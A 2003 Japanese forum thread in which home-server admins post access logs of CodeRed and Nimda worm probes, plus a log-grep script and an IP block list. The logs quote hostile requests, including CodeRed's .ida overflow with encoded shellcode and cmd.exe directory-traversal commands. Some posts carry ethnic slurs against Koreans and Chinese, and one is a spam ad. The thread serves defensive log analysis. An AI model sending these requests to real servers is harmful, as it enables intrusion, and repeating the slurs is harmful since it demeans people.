この鯖ワームにやられてます
自宅で鯖も善いけど、管理はちゃんとしようよ。 ログを汚すだけではなく、ネットワーク資源のムダ使いの CodeRedやNimdaその他のワームにやられてる鯖を教え合おう!! 管理者がこの板みて、対処を期待する。 >>23 警告メールは、やっぱり、 「回線切って、首つって、氏ね」 みたいなの? >>19 それってぷららのDDNS使ってるからじゃない? Nimdaはご近所さん攻撃するものだし。 確かにNimdaは感染したマシンのセグメント付近に攻撃するよね。 所詮DDNSは、とりあえず立てましたって人が使うから管理甘いのよね。 >>23 こんだけ騒がれてるのにいまだにワームをまきちらかしてるような奴が そんなの読むわけないと思われ。 だいたいWindowsが多いんだからrootに出してもまず無意味。 net send(smbclient -M)を送り返すとかしたほうがまだしも効果があるだろう。 久々だな。 62.217.134.16 - - [13/Feb/2003:19:21:53 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801% u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 226 最近codered多くない? しばらくこなかったけど 最近1日3回位くるYO ちなみに屋不ーBB [Thu Feb 13 18:32:04 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ/winnt/system32/cmd.exe [Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..タッ/winnt/system32/cmd.exe [Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ?/winnt/system32/cmd.exe [Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%5c/winnt/system32/cmd.exe [Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%2f/winnt/system32/cmd.exe 俺みたいにISDNで鯖をやってるようなヤシの所にも来るのか・・・ >>33 うちもYahoo!BBだよ。 多すぎってほどじゃないけど、やっぱり日に2〜5件くらいはくるですねぇ。 ……と、access_logをgrepして気が付きますた。 全然久々じゃないじゃないか (w お前らみたいな糞坊が鯖なんか立てるから、ウィルスが万円して逝くんだよ もっと勉強してから立てれ 漏れの所も… その1 [Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/scripts [Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/MSADC [Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/c [Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/d その2 [Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/scripts [Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/MSADC [Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/c [Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/d 両方ともにahoo!BB。 頼むよ。漏れもahoo!BBなんだけどさ(涙 うちもぷららのDDNS使ってますが、サーバ開通直後に わんさか来たので、ログの一部をサポートセンターに 送って対処をお願いしたら、それ以後は随分少なく なりましたよ。まあ、偶然かもしれませんが... やっぱり偶然でした(T_T) どうやら、土日はお休みで電源が落ちていただけの模様です。 ただのパソコンなんだろうな... 友人のケースでは、相手を特定して電話してやっと解決したってケースがありました。 相手は設計事務所のサーバーだったそうです。 それだから連絡先がわかった、と いうことでもありますが。 プロバイダーはシカトを決め込んでいたそうです。 少々のワームやウイルスはいちいちかまってられないが、 前OCNユーザーから1日200通のウイルスメールがきたときは さすがにたまりかねてOCNに連絡したよ… 鯖とは関係ない話だがな… 218.9.76.4 - - [07/Mar/2003:22:22:26 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 218.11.16.6 - - [06/Mar/2003:21:32:04 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 218.4.144.106 - - [06/Mar/2003:21:09:25 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 218.12.182.39 - - [06/Mar/2003:07:46:12 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 いい加減蝋人形にしちゃうよ?! 218.9.6.222 - - [08/Mar/2003:12:13:13 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" 218.18.18.72 - - [08/Mar/2003:15:38:43 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" 218.27.89.97 - - [08/Mar/2003:18:23:39 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" 218.6.243.62 - - [08/Mar/2003:19:01:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" 218.244.75.70 - - [08/Mar/2003:20:31:32 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" いい加減蝋人形にしちゃうよ?! 本日のニムダアクセス 韓国 61.250.216.1 中国 61.132.75.252 #!/bin/sh if [ $1 ] && [ -f $1 ]; then ACCESS_LOG=$1 elif [ -f /usr/local/apache/logs/access_log ]; then ACCESS_LOG=/usr/local/apache/logs/access_log else echo "usage: $0 path_to_access_log" exit 1 fi egrep "cmd.exe|root.exe|NNNNNN" $ACCESS_LOG \ | awk '{ print $4,$5,$1; }' \ | sort -k 3,3 -u | sort -k 1,1 \ | sed -e 's/^/スキャン歓迎: /g' | more exit 0 "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 上のようなログがたくさんあるんですが、404じゃなくて302なのです・・・。 なんでかわかるかた教えてくださいm(__)m これはどうなのかな。。。 [Sun Mar 09 23:10:05 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ/winnt/system32/cmd.exe [Sun Mar 09 23:10:07 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..タッ/winnt/system32/cmd.exe [Sun Mar 09 23:10:09 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ・winnt/system32/cmd.exe [Sun Mar 09 23:10:15 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%5c/winnt/system32/cmd.exe [Sun Mar 09 23:10:20 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%2f/winnt/system32/cmd.exe ∋8ノノハ.∩ 川o・-・)ノ <先生!こんなのがありました! __/ / / \(_ノ ̄ ̄ ̄\ ||ヽ|| ̄ ̄ ̄ ̄|| ...|| ̄ ̄ ̄ ̄|| http://saitama.gasuki.com/saitama/ うちも、チョンとチャンコロばっかりです。 http://www.arearesearch.co.jp/ip-kensaku.html 今日は珍しく、アメリカのDSL回線とアラブ首長国連邦があった default.ida?XXXXX...増殖中。 0件: 5/Mar 0件: 6/Mar 0件: 7/Mar 0件: 8/Mar 0件: 9/Mar 0件: 10/Mar 12件: 11/Mar 48件: 12/Mar 上にもあるが、最近こんなヤシが来るんですがこれもCODEREDだよね? 2003/03/13(13:14:12) W-SV 219.*.***.*** [80] 404 237 "GET / default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXY090V858\bd3W801Y090 V858\bd3W801Y090V858\bd3W801Y090Y090X190P0c3P003Xb00U31bU3ffP078 P000P0=a HTTP/1.0" 今まで見たNNNってヤシと違うもんだから気になって、、 韓国と中国がものすごく多い。 あと、日本国内だと普通の企業とか。 ここ数日はCodeRed IIが多いですね、国内外を問わず。 荒らしてくれるのは、 愛知、神奈川、埼玉あたりが多いです。 我々に直接的な害はないんですがね。 見てて気持ち悪いですよ。 こんなの出てた 61.191.128.106 - - [15/Mar/2003:20:26:20 +0900] "GET /default.ida?XXXX XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275 61.48.32.168 - - [15/Mar/2003:20:33:57 +0900] "GET /default.ida?XXXXXX XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275 61.83.171.22 - - [15/Mar/2003:22:54:03 +0900] "GET /default.ida?XXXXXX XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276 CodeRedII多いなぁ 219.168.40.15 - - [15/Mar/2003:06:09:38 +0900] "GET /default.ida?XXXXXXXXXXXXXX 219.93.193.170 - - [15/Mar/2003:12:12:01 +0900] "GET /default.ida?XXXXXXXXXXXXX 219.94.102.51 - - [15/Mar/2003:16:44:21 +0900] "GET /default.ida?XXXXXXXXXXXXXX 219.145.159.175 - - [15/Mar/2003:17:57:31 +0900] "GET /default.ida?XXXXXXXXXXXX 219.138.9.227 - - [15/Mar/2003:19:18:09 +0900] "GET /default.ida?XXXXXXXXXXXXXX 218.64.67.194 - - [15/Mar/2003:18:26:32 +0900] "GET /default.ida?XXXXXXXXX 流行ってるね。 設置者は居ても、管理者が居ない鯖が多いということで ★あなたのお悩み解決致します!! ●浮気素行調査 彼氏、彼女、妻、夫の浮気を調査致します!! ●盗聴器盗撮機発見 あなたの部屋に誰かが仕掛けているかも!! ●行方調査 行方不明になっている家族の消息を調査致します!! ●電話番号から住所割り出し 一般電話、携帯から住所を割り出し致します!! ●ストーカー対策 社会問題ともなっているストーカーを撃退致します!! その他人生相談からどんなお悩みでも解決いたします!! 直通 090−8505−3086 URL http://www.h5.dion.ne.jp/ ~grobal/ メール hentaimtt@k9.dion.ne.jp グローバル探偵事務局 003/03/16(20:32:54) W-SV 61.199.98.125 [80] 200 950 "GET /kiyaku.html HTTP/1.1" 2003/03/16(20:33:31) W-SV 61.251.250.14 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:33) W-SV 61.251.250.14 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:36) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..\../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:36) W-SV 61.251.250.14 [80] 403 262 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:37) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:37) W-SV 61.251.250.14 [80] 403 275 "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:41) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:41) W-SV 61.251.250.14 [80] 403 275 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:44) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/msadc/..\../..\../..\/..チ../..チ../..チ../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:44) W-SV 61.251.250.14 [80] 403 291 "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:45) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..チ../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:45) W-SV 61.251.250.14 [80] 403 263 "GET /scripts/..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" CodeRedIIウザー(´Д`; 219.138.52.14 - - [19/Mar/2003:00:45:01 +0900] "GET /default.ida? 219.234.238.253 - - [18/Mar/2003:18:09:40 +0900] "GET /default.ida? 219.215.44.61 - - [18/Mar/2003:20:44:08 +0900] "GET /default.ida? 219.138.1.212 - - [19/Mar/2003:01:34:27 +0900] "GET /default.ida? 219.68.217.243 - - [19/Mar/2003:01:50:51 +0900] "GET /default.ida? 中国でもWindowsServer使ってるのか・・・ テストのため1日晒してただけで結構来るねぇ。 迷惑。マシンごと逝ってくれ、とくに220.13.136.85 YahooBB220013136085.bbtec.net - - [18/Mar/2003:04:00:21 +0900] "GET /default.ida?XXXXXXXXX YahooBB220013232179.bbtec.net - - [18/Mar/2003:07:09:43 +0900] "GET /default.ida?XXXXXXXXX YahooBB220027008006.bbtec.net - - [19/Mar/2003:09:17:43 +0900] "GET /default.ida?XXXXXXXXX >>71 うちも220.*.*.*からばかり来てるな。 まだそれほど多いと感じて無いけど。 61.236.229.237からCodeRedが北んで、何かと思ってアクセスしたら、 www.okxa.comというドメインのサイトですた。 何、ココ?エロゲサイト? うちは、1日に、CodeRedが34回、Nimdaが32回なんてのも、 普通だす。 なんとかしたいのでつが・・・ サーバーは、BIGLOBEです。。 >>73 下にメアド書いてあるじゃん。とりあえず英語と中国語?で文句言ってみれば? まぁ、MicroSoftのWebサイトにCodeRed.F対策のアナウンスが挙がってるんだから 身に覚えのある人はパッチをあてて欲しいですね 最近やたらCodeRedII多くないかい? 218.***.***.***から目茶苦茶(100/day程度)来るんだけど あーうぜー 初めて見た。 210.220.73.20 - - [02/Apr/2003:06:56:31 +0900] "GET / HTTP/1.1" 200 765 "-" "-" 210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.printer HTTP/1.1" 404 1059 "-" "-" 210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u 0000%u0000%u838b%u0094%u0000%u408・・・以降文字化けで表示できない SYN Flood Attackしてくる香具師もなんとかしる >78 ウチにも来たよ 211.189.57.126から 最初はイタズラされてるだけあかと持ったんだけど、新しいワームかね? 相手はコーリャンのIISでした。 211.158.61.191 - - [06/Apr/2003:05:12:15 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:20 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:25 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:31 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:36 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:41 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:47 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:52 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:57 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:02 +0900] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:08 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194 211.158.61.191 - - [06/Apr/2003:05:13:13 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194 211.158.61.191 - - [06/Apr/2003:05:13:18 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:24 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:29 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:34 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215 ウザい。 どかーん! (⌒⌒⌒) || / ̄ ̄ ̄ ̄ ̄\ | ・ U | | |ι |つ U||  ̄ ̄ ||  ̄  ̄ もうおこったぞう 61.232.0.1-61.237.255.254<!-- (CN)CHINA RAILWAY TELECOMMUNICATIONS CENTER --> 218.13.0.1-218.18.255.254<!-- (CN) CHINANET Guangdong province network Data Communication Division China Telecom --> 218.144.0.1-218.159.255.254<!-- (KR)KOREA TELECOM Network Management Center --> 220.64.0.1-220.71.255.254<!-- (KR)KRNIC Korea Network Information Center --> 220.72.0.1-220.87.255.254<!-- (KR)KOREA TELECOM Network Management Center --> 220.112.0.1-220.115.255.254<!-- (CN)Greatwall Broadband Network Co.Ltd. --> 220.163.0.1-220.165.255.254<!-- (CN)CHINANET yunnan province network China Telecom --> アク禁 >80 >最初はイタズラされてるだけあかと持ったんだけど、 いたずらしないで頂きたい。 ログ汚れ過ぎ IIS狙われすぎ ついでにsage過ぎ あれ以来きてない。 >83 正解かも どうもアタックの内容がアレなせいで落ちてるっぽいのよね IPアドレスじゃなくてドメインで狙われてるっぽいし・・・ これは? 09.191.15.2 - - [09/Apr/2003:08:04:57 +0900] "GET /cgi-bin/formmail.pl HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:01 +0900] "GET /cgi-bin/formmail.cgi HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:03 +0900] "GET /cgi-bin/FormMail.pl HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:05 +0900] "GET /cgi-bin/FormMail.cgi HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:09 +0900] "GET /cgi-sys/formmail.pl HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:10 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:21 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-sys/FormMail.pl HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-bin/Formmail.pl HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:24 +0900] "GET /cgi-bin/mail.pl HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:25 +0900] "GET /cgi-bin/FORMMAIL.PL HTTP/1.0" 404 1184 板違いだけどついでにこれも 0-2pool57-34.nas10.lansing2.mi.us.da.qwest.net - - [08/Apr/2003:13:58:44 +0900] "CONNECT mailin-04.mx.aol.com:25 HTTP/1.0" 405 992 "-" "-" 多分オープンプロキシの検索ロボットだけど、踏み台に利用されないように。 >>86 は任意の宛先に送信できるメール送信 CGI を狙った spammer。 >>87 は外部から任意のポートに接続できるプロクシを狙った spammer。 あの手、この手ですよね。 まえにスパムを配信するウイルスの実験が行われていた可能性があると 記事で読んだ記憶があるけど。 スパムとワーム。何かオーバラップらして見えてくるのは自分だけかな。 メールヘッダーが変なんですけど。何かわかりますかね。 ヘッダーは2.4KBあり、、Comments:の行がやたら長いです。 本文はスパムみたいなんですけど、sendmailのバグを狙っているような... ワームの様な気もしてます。。。 Return-Path: <mailbox1@usgreencardoffice.com> Received: from smtp1.cwidc.net (smtp1.cwidc.net [154.33.63.111]) by xxxx.jp (8.12.8/8.12.5) with ESMTP id h3BDBGKZ017325 for <xxxxx@xxxxx.jp>; Fri, 11 Apr 2003 22:11:19 +0900 Received: from [154.33.63.58] (helo=mail8.cwidc.net) by smtp1.cwidc.net with esmtp (Exim 3.20 #4) id 193yJ3-0004So-00 for xxxxx@xxxxx.jp; Fri, 11 Apr 2003 22:11:01 +0900 Received: from pop by mail8.cwidc.net with local (Exim 3.20 #2) id 193yIz-0003BH-00 for xxxxx@xxxxx.jp; Fri, 11 Apr 2003 22:10:57 +0900 Received: from [206.40.228.122] (helo=sm22.localdomain) by mail8.cwidc.net with esmtp (Exim 3.20 #2) id 193yIy-0003AM-00; Fri, 11 Apr 2003 22:10:56 +0900 Received: from unknown Date: Fri, 11 Apr 2003 07:10:19 -0600 (MDT) Message-Id: <200304111310.h3BDAJIV019352@sm22.localdomain> Comments: Received: from PbD:C6?oC65]:?E6CB]@C];A|E2<6492?oC65]:?E6CB]@C];ANz B Received: from Jx2<2oC65]24|2:2:oC65]2?]688]@C];A|46J`geb_oC65]2?]688]@C];A|7FC F<2H2oC65]2?]688]@C];A|8@?K@FoC65]2?]688]@C];A|9\@oC65]2?]688]@C];ATx M Recei ved: from Ma92>2oC65]2?]688]@C];A|9:0?6EoC65]2?]688]@C];A|9:<2CFoC65]2?]688]@C]; A|:K>\AoC65]2?]688]@C];A|<2EF9:D2oC65]2?]688]@C];A|<:>:oC65]2?]688]@C];ATv T Re ceived: from Tu<F>2oC65]2?]688]@C];A|<FD2?@oC65]2?]688]@C];A|>:J2?@oC65]2?]688] @C];A|?30>2?2oC65]2?]688]@C];A|E\6oC65]2?]688]@C];A|E2<2\<oC65]2?]688]@C];ATq R Received: from AcE6E@C2oC65]2?]688]@C];A|A2EC:4<oC65]2EC]4@];A|92D6oC65]6> 2:=]?6];A|KIad_oC65]6>2:=]?6];A|36673@H=oC65]9@E]4@];A|3JC5oC65]9@E]4@];ATz G Re ceived: from Rm9@?6J366oC65]9@E]4@];A|<:?492?oC65]9@E]4@];A|?282@oC65]9@E]4@] ;A|JFA@>oC65]9@E]4@];A|2=8oC65]:?E6CB]@C];A|3@>3oC65]:?E6CB]@C];AMr Z Receive d: from Nr43c__7oC65]:?E6CB]@C];A|4J36CoC65]:?E6CB]@C];A|7F8F@oC65]:?E6CB]@C]; A|92J2EoC65]:?E6CB]@C];A|9:C@E@oC65]:?E6CB]@C];A|9@C:<:E2oC65]:?E6CB]@C];ATT T Received: from Nz<2KF9:C@oC65]:?E6CB]@C];A|<:5oC65]:?E6CB]@C];A|<@3@=5DoC65]: ?E6CB]@C];A|>2DoC65]:?E6CB]@C];A|>2D2@oC65]:?E6CB]@C];A|>:J23:oC65]:?E6CB]@C]; ARb Y Received: from PQ?:;:oC65]:?E6CB]@C];A|?@<@oC65]:?E6CB]@C];A|D2326oC65]: ?E6CB]@C];A|D249:oC65]:?E6CB]@C];A|D6?36:oC65]:?E6CB]@C];A|D:=6?46oC65]:?E6CB] @C];ARz M Errors: mailbox1@usgreencardoffice.com From: "US Green Card Office Ltd." <mailbox1@usgreencardoffice.com> To: Customer <customer@usgreencardoffice.com> Subject: Get a Green Card for USA MIME-Version: 1.0 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Status: うざい 219.140.150.166 - - [13/Apr/2003:16:51:23 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-" 219.140.150.166 - - [13/Apr/2003:16:51:26 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-" ・ ・ ・ 前にCodeRedに対抗するCode Greenてのが来たけど もう来ないな。 またこないかな。 OrgName: Asia Pacific Network Information Centre NetRange: 202.0.0.0 - 203.255.255.255 CIDR: 202.0.0.0/7 ここ、IPうじゃうじゃ持ってて最高にうざい。 二日で100個以上CodeRed来てるけど、ここが8割占めてたw LAN内全感染の悪寒。 ってかIPいっぱいあるから一見いろんなとこから来てるみたいだけど、穴のあるところが 全部穴になって被害を広めてるのね。 #Apache初心者だから、ログを取らせない方法が良くわかんねえよ。 ・ウイルス扱いにする。 ・指定ファイルにアクセスしようとしたのは載せない。 ・実際に、0Byteの指定ファイルを作っておく。 があった。みんなどうよ?つーかどれが普通よ? 略称のほうは知ってた・・ APNICかよ。 マトモなとこだから他から経由されてるだけな気がするな・・・ >>93 それ中国あたりのブロック割り当てじゃない? うちにも中国方面からガンガンくるよ。 >>96 手作業での登録ですか? 手間が馬鹿にならんので、テクニックあればいいんだけど。 CodeRedが大量に来てますね... ⇒219.156.232.21 219.237.77.95 219.181.154.52 219.140.211.162 12.235.16.127 あと、ガーラって調査会社のロボット検索もウザイ ⇒211.4.250.133 OrgName: Asia Pacific Network Information Centre OrgID: APNIC Address: PO Box 2131 City: Milton StateProv: QLD PostalCode: 4064 Country: AU NetRange: 219.0.0.0 - 219.255.255.255 CIDR: 219.0.0.0/8 NetName: APNIC5 NetHandle: NET-219-0-0-0-1 OrgName: AT&T WorldNet Services OrgID: ATTW Address: 400 Interpace Parkway City: Parsippany StateProv: NJ PostalCode: 07054 Country: US NetRange: 12.0.0.0 - 12.255.255.255 CIDR: 12.0.0.0/8 NetName: ATT NetHandle: NET-12-0-0-0-1 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 211.4.250.0 b. [ネットワーク名] I2TS-NET f. [組織名] 株式会社イーツ g. [Organization] I2ts Inc., m. [運用責任者] MK5986JP n. [技術連絡担当者] HI1771JP n. [技術連絡担当者] MK5986JP >>102 ってなってるけど、がーらって会社なの? >>105 nslookupで逆引きすると、gala-net.co.jpという ドメインが出てきます。何の会社かと思って ホームページを見たら、ネット上の書き込みを 自動巡回してチェックするサービスを提供していました。 最近、フレッシュアイのロボット検索が定期的に 来るようになって、フレッシュアイにも情報が 登録されたんですが、それをガーラのロボットが 検出して、探りを入れに来ているようです。 YahooBB220013168112.bbtec.net - - [18/Apr/2003:23:11:33 +0900] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ?????? HTTP/1.0" 400 178 220.13.168.112うざすぎ。 YBBにメールして遮断できないものだろうか… >>100 来ている来ていないの問題じゃなくて(ry >>109 YBBならIP変わらないみたいだから、アクセス制限リストに 放り込んで置けば宜しいかと。まあ、それでも鬱陶しい 事に変わりは無いけど。 ☆^〜^★ 50音順で探せて楽して得する http://sagatoku.fc2web.com/ あなたの探し物きっとみつかるよ☆^〜^★ 最近こんなのが来てる。 202.98.1.21 - - [27/Apr/2003:16:37:47 +0900] "GET / HTTP/1.1" 400 296 "-" "-" 202.98.1.21 - - [27/Apr/2003:16:37:48 +0900] "POST / HTTP/1.1" 413 1035 "-" "-" 当方やふーbbですが、 昨日Anhttpdで適当にweb鯖を立てて放置したところ いろいろ釣れました。 なんですかコリャ? 相手もやふーbbのようで。。 感染したワームが、一体何をしようとしているのだかよく分からんが xが延々と並んでいるのが、噂に聞くバッファオーバーフローってやつですか? 一日中こんなの送ってきて動作が重くなったりしないんだろか 219.144.82.204 - - [30/Apr/2003:20:23:54 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u 8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:45:59 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 211 219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET 